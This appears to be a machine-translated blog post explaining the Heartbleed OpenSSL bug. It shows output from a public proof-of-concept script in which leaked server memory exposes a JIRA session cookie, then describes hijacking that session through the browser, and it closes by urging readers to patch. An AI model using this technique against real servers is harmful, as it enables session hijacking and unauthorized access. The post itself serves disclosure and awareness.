The Heartbleed problem is actually worse than it can be seen now (it seems to be broken now ).
Heartbleed (CVE-2014-0160) is an OpenSSL vulnerability that allows any remote user to dump some of the server's memory. Yes, it's really bad. It is worth noting that a skilled user can use it to dump the RSA private key used by the server to communicate with the customer through a process. The level of knowledge/skills required to initiate such attacks is not very high, but may exceed the average level of junior users of the script.
So why is Heartbleed worse than you think? This is simple: currently, the script of conceptual evidence is available to allow any client to perform session hijacking attacks on User Logon anywhere in the world.
The conceptual proof that was most widely shared this morning was such a simple Python script: https://gist.github.com/takeshixx/10107280. With this script, anyone in the world can dump part of the memory from a vulnerable server.
Let's take a look at the output of this tool (for vulnerable servers running JIRA's ticket tracking system. To improve readability, the hexadecimal output has been deleted.
[Matt @ laptop ~] # Python heartbleed. py jira.XXXXXXXXXXX.com
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... Received message: type = 22, ver = 0302, length = 66
... Received message: type = 22, ver = 0302, length = 3239
... Received message: type = 22, ver = 0302, length = 331
... Received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... Received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
. @ .. GET/browse/
En_US-cubysj-198
8229788/6160/11/
(Lots of garbage)
...... Ac
Cept-Encoding: g
Zip, deflate, sdch
.. Accept-signature AG
E: en-US, en; q = 0.
8. Cookie: atlas
Sian. xsrf. token =
BWEK-0C0G-BSN7-V
OZ1 | 3d6d84686dc0
F214d0df1779cbe9
4db6047b0ae5 | lou
T; JSESSIONID = 33
F4094F68826284D1
8AA6D7ED1D554E ..
. E. $ 3Z. l8.M... e5
... 6D7ED1D554E...
......*..?. E. B ..
WARNING: server returned more data than it shoshould-server is vulnerable!
This must be a dump of the memory generated by the last GET request. Have you noticed the above JSESSIONID Cookie? This is the method that JIRA uses to track your HTTP session to determine whether you have logged on. If this system requires verification (like JIRA installation), I can insert this cookie into my browser and become a legal user of this JIRA installation program.
Insert the session ID cookie into the browser ).
After saving the modified cookie, refresh the browser.
Reload and install JIRA. Note that we are logged on to the installation program.
As shown above, once we get a valid session ID cookie, we can access JIRA installation as an internal employee. The only way to detect this type of attack is to check the source address of each request communication.
This Heartbleed vulnerability is terrible, and almost nothing is done to prevent remote attackers from executing a session hijacking attack that allows bypass authentication. Patch your system immediately.
For more information about Heartbleed, click here.
Heartbleed: click here
OpenSSL TLS heartbeat read remote information leakage (CVE-2014-0160)
Severe OpenSSL bug allows attackers to read 64 KB of memory, fixed in half an hour in Debian
OpenSSL "heartbleed" Security Vulnerability
Provides FTP + SSL/TLS authentication through OpenSSL and implements secure data transmission.